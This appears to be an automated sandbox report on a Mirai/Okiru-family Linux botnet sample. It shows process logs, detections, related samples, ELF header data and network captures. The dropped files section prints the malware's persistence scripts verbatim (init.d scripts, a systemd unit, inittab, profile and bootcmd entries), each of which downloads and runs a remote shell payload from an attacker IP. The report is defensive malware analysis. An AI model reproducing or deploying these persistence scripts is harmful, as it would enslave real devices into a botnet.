Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6387/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6368/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6324/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6367/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6389/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6380/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6382/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6381/status	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6300)	File opened: /proc/6359/status	Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 6263)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6285)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6287)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6289)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6290)	Shell command executed: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6292)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/x86_64.nn.elf (PID: 6294)	Shell command executed: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6286)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6291)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh			Jump to behavior

Source: /bin/sh (PID: 6293)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /usr/bin/dash (PID: 6223)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.8HLRL3m5se /tmp/tmp.gTEsyrYvVk /tmp/tmp.bikVxVdgkX			Jump to behavior
Source: /usr/bin/dash (PID: 6224)	Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.8HLRL3m5se /tmp/tmp.gTEsyrYvVk /tmp/tmp.bikVxVdgkX			Jump to behavior

Source: /bin/sh (PID: 6269)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 6246)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6286)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6291)	File: /etc/init.d/sh (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/x86_64.nn.elf (PID: 6246)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/x86_64.nn.elf (PID: 6246)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6289)	Writes shell script file to disk with an unusual file extension: /etc/init.d/sh	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/x86_64.nn.elf (PID: 6246)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6289)	File: /etc/init.d/sh			Jump to dropped file

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match	File source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_64.nn.elf PID: 6246, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: x86_64.nn.elf, type: SAMPLE
Source: Yara match	File source: 6246.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x86_64.nn.elf PID: 6246, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
x86_64.nn.elf	26%	ReversingLabs	Linux.Backdoor.Mirai
x86_64.nn.elf	100%	Avira	EXP/ELF.Mirai.W
x86_64.nn.elf	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
/etc/init.d/sh	3%	ReversingLabs	Text.Browser.Generic
/etc/init.d/system	3%	ReversingLabs	Text.Browser.Generic
/etc/rc.local	0%	ReversingLabs

Name	Source	Malicious	Reputation
http://94.156.227.233/lol.sh	x86_64.nn.elf, 6246.1.00007ffd2d90d000.00007ffd2d92e000.rw-.sdmp	false	high
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s	x86_64.nn.elf	false	high
http://94.156.227.233/	x86_64.nn.elf, system.16.dr, inittab.16.dr, sh.36.dr, profile.16.dr, custom.service.16.dr, bootcmd.16.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
54.171.230.55	unknown	United States	16509	AMAZON-02US	false
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
94.156.227.234	unknown	Bulgaria	57463	NETIXBG	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54.171.230.55	nsharm5.elf	Get hash	malicious	Unknown	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	zerarm6.elf	Get hash	malicious	Unknown	Browse
	mips.elf	Get hash	malicious	Unknown	Browse
	hidakibest.arm7.elf	Get hash	malicious	Gafgyt, Mirai	Browse
	Space.x86.elf	Get hash	malicious	Mirai	Browse
	nn.elf	Get hash	malicious	Nanominer, Xmrig	Browse
	arm6.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	dlr.arm6.elf	Get hash	malicious	Unknown	Browse
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
94.156.227.234	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	mips.nn.elf	Get hash	malicious	Okiru	Browse
91.189.91.43	nshppc.elf	Get hash	malicious	Unknown	Browse
	nshsh4.elf	Get hash	malicious	Unknown	Browse
	Mozi.m.elf	Get hash	malicious	Unknown	Browse
	nshmips.elf	Get hash	malicious	Unknown	Browse
	Mozi.m.elf	Get hash	malicious	Unknown	Browse
	arm.elf	Get hash	malicious	Unknown	Browse
	nsharm5.elf	Get hash	malicious	Unknown	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	arm6.elf	Get hash	malicious	Unknown	Browse
	hmips.elf	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	nshppc.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	nshsh4.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	nshmips.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	arm.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	nsharm5.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	arm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	hmips.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
AMAZON-02US	fnCae9FQhg.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	SFtDA07UDr.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	https://app.salesforceiq.com/r?target=631f420eed13ca3bcf77c324&t=AFwhZf065tBQQJtb1QfwP5t--0vgBJ0h_ebIEq5KFXSXqUZai5J8FQSwWrq93GQOlAns9KDGvW4ICfvxj8Z5CJD1Q9Wt5o0NW5c0cKHizUAbubpaOgmKjcVLdh1YXO2nIltTeoePggUL&url=https://monaghans.jimdosite.com	Get hash	malicious	HTMLPhisher	Browse	54.73.104.6
	nsharm5.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	Gq48hjKhZf.exe	Get hash	malicious	LodaRAT	Browse	185.166.143.49
	Gq48hjKhZf.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
	2oM46LNCOo.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	tTGxYWtjG5.exe	Get hash	malicious	LummaC	Browse	185.166.143.48
	iaLId0uLUw.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
	yuij5p5p3W.exe	Get hash	malicious	LummaC	Browse	185.166.143.50
INIT7CH	nshppc.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	nshsh4.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	nshmips.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	Mozi.m.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	arm.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	nsharm5.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	arm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	hmips.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
NETIXBG	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sparc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn-20241224-0652.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	arm.nn-20241224-0652.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm5.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/system	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
/etc/init.d/sh	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.663595298101345
Encrypted:	false
SSDEEP:	3:KPJRK+KFtSyLdjX48FIbILbaaFOdFXa5O:WJ8+KHSYZX48bbaaeXCO
MD5:	3290F4F4E0B77B577C59026DEF246CEE
SHA1:	C51EAE7170430B5697B881BE716280D1FAAA9147
SHA-256:	534E1753E7B5026C5F689F31942BD84E7869232A5CE24AE02B0A9647B3E2EDCD
SHA-512:	DFE561F390A0003C92D0528D418CADA2A84DD4585F838F4A37BDD1790C8B7E947AFD31B527E4F98AD55F49F4168F4574540CCFF2D2EE38BD2A3923DEB9FE6345
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	run bootcmd_mmc0; /bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/sh

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	355
Entropy (8bit):	4.416220583499086
Encrypted:	false
SSDEEP:	6:h2Rk8d/Kd6Nx/SNAjDTZX48bJaJFCwWBvM1FnwfUMdNfabwHeJdxL/RuYHdSOovl:QRkobNxaNoPUJgjvM1F5KN+dRRucSOyl
MD5:	4C835AF4434E28E5B56D8CDFA8EE753D
SHA1:	B18DA30B2DF68AE4C788540CED328CA545C02F42
SHA-256:	CA0FAC03BB49D9F40E83353A3C85D27B8AD800B8A77F88D1B43025148672E28D
SHA-512:	877B96464C5D6AF38B84F8BE6ECDDA74A9703AA298A897B2EF8DEC9E9B929ECA2E8324979A80033B0E334820B15275E51C1E60EC5A26A7B379A2D8DA5BAC6162
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh.# /etc/init.d/sh..case "" in. start). echo 'Starting sh'. /bin/sh &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh'. killall sh. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	98
Entropy (8bit):	4.615605979741142
Encrypted:	false
SSDEEP:	3:TKH4v9+KFyFiLdjX48FIbILpaKB0dFLoKE0:h8KooZX48bzBeLXE0
MD5:	FE7F857A52EC42881A76D01D4A4A1C3C
SHA1:	6391FE715F06AB2D7E58D18A41ED3A358C7E820C
SHA-256:	20B80070DF0EDB6A011753C41051823E2F87C46A5493D6323BB5C023A19D2870
SHA-512:	4AA09F596ACE2DA18FE88DA2224681EAB2A4F77D005E2C67E97E9A0751C387F8DCCD8D1BB05644D75ED2F42959B6EE491D292F80CFEBB5D80EA5F0CE84C47816
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_32.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse Filename: x86_64.nn.elf, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	#!/bin/sh./bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	103
Entropy (8bit):	4.612417623467759
Encrypted:	false
SSDEEP:	3:nAWu5YFtSyLdjX48FIbILbaaFOdFXa5O:A6HSYZX48bbaaeXCO
MD5:	175C6814BBE06EB5816EFE3FE3934230
SHA1:	8C1A49BF7CA134E8AD0DDA70872367062BC600C5
SHA-256:	11CB198833B5FB514AF33682A7148F95AA28CAEA16908A27FA10D71DD272730E
SHA-512:	C1A6BC79D50EEED397A98329E7A2CD7486CBB36F9D3B25AEADA15473D10C31FC2F44D2029F5A174FC813E3BB6B974174850989BF2ADD642F4CD4F1D279B6B1F1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	::respawn:/bin/sh && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.486383977913608
Encrypted:	false
SSDEEP:	3:pKWNFyFiLdjX48FIbILbaaFOdFXa50:kKooZX48bbaaeXC0
MD5:	CEC61C0CDC61AB271C45B85281469388
SHA1:	E2DC08B86AC16A6A9BDA73D26DE0055528C647D9
SHA-256:	AE69256D9ACCEE8C05AFBF46267368A0DDB3E5C9C54D24CFB018A35FEF86C560
SHA-512:	71A65EB5CBBD53E395E8A2B392CB41E289874583C4A17E086498201C6078E5043B680B4971D1913863B2699626F05F63B0936BAFCE9A8F01C6DBAFEE5E93F2A7
Malicious:	true
Preview:	/bin/sh &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/x86_64.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.064804988275458
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+Gs2+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+y+GWRdtd+GWRXY+GWRuL1I
MD5:	8156A50E9D158639626649BD134E7D5D
SHA1:	D95D108656621F4B4F82B93CA0694D66F4A2FEF4
SHA-256:	FB7F3B6DA55120E08AB0B9A9F4A9ECB1BB5D89BFD665EBE23C150FBFBC06E4D8
SHA-512:	DB79A871E5317E3B9A93FF84E71318F5ABC85EBDE7C9521DF35C20C0AD8251BEB3DB33673BE4F4FF2501256613C50128BA36323C0DECD348FF6CA8A73856BE10
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/bin/sh.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

Static File Info

General

File type:	ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.305579911063879
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	x86_64.nn.elf
File size:	80'064 bytes
MD5:	2625d466242beff54d4aaa9db383064a
SHA1:	807ddc9abbe9b7ab0f4e34f6e41175c5703eda51
SHA256:	bdc1215cdb03a2143791d976a1474889a0f1408fc81cbe6331d5d3f7a7c858f8
SHA512:	e1b258b4b9236d7a9076fecc69576361e8796981d206517a4b3b7b3aeeb896ccee88e3d5ea8a79a6f1b3c6ce63ea72d1b09d70ce34e81704bc75db688af7b396
SSDEEP:	1536:kxikKSsAtdkuR3MNjlofBrZG+SBL1441i0N/aM2wR:kJKSsAtSkOjlofBrZG+01441l/aMx
TLSH:	8B733B07788080FCC589C274576FB63AD977B07D1238B2AA67D8FB226F89D605F1E944
File Content Preview:	.ELF..............>.......@.....@.......@6..........@.8...@.......................@.......@......-.......-.......................0.......0Q......0Q............../..............Q.td....................................................H...._....Z...H........

Static ELF Info

ELF header
Class:	ELF64
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Advanced Micro Devices X86-64
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x400194
Flags:	0x0
ELF Header Size:	64
Program Header Offset:	64
Program Header Size:	56
Number of Program Headers:	3
Section Header Offset:	79424
Section Header Size:	64
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x4000e8	0xe8	0x13	0x0	0x6	AX	1
.text	PROGBITS	0x400100	0x100	0x10386	0x0	0x6	AX	16
.fini	PROGBITS	0x410486	0x10486	0xe	0x0	0x6	AX	1
.rodata	PROGBITS	0x4104a0	0x104a0	0x2870	0x0	0x2	A	32
.ctors	PROGBITS	0x513000	0x13000	0x10	0x0	0x3	WA	8
.dtors	PROGBITS	0x513010	0x13010	0x10	0x0	0x3	WA	8
.data	PROGBITS	0x513040	0x13040	0x5c0	0x0	0x3	WA	32
.bss	NOBITS	0x513600	0x13600	0x29a8	0x0	0x3	WA	32
.shstrtab	STRTAB	0x0	0x13600	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x12d10	0x12d10	6.3958	0x5	R E	0x100000	.init .text .fini .rodata
LOAD	0x13000	0x513000	0x513000	0x600	0x2fa8	3.8390	0x6	RW	0x100000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x8

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 11:37:55.021271944 CET	443	33606	54.171.230.55	192.168.2.23
Dec 24, 2024 11:37:55.021493912 CET	33606	443	192.168.2.23	54.171.230.55
Dec 24, 2024 11:37:55.141104937 CET	443	33606	54.171.230.55	192.168.2.23
Dec 24, 2024 11:37:55.971515894 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:56.048556089 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 11:37:56.091166973 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 11:37:56.091239929 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:56.091293097 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:56.210838079 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 11:37:56.606880903 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:56.770981073 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 11:37:57.226402044 CET	38242	60008	94.156.227.234	192.168.2.23
Dec 24, 2024 11:37:57.226835012 CET	60008	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:57.610447884 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:57.730376959 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 11:37:57.730582952 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:57.730583906 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:57.850259066 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 11:37:58.252650976 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:58.419040918 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 11:37:58.852060080 CET	38242	60010	94.156.227.234	192.168.2.23
Dec 24, 2024 11:37:58.852140903 CET	60010	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:59.254134893 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:59.373765945 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 11:37:59.373874903 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:59.373874903 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:37:59.493397951 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 11:37:59.887217045 CET	60012	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 11:38:00.047027111 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:00.494373083 CET	38242	60012	94.156.227.234	192.168.2.23
Dec 24, 2024 11:38:00.494461060 CET	60012	38242	192.168.2.23	94.156.227.234
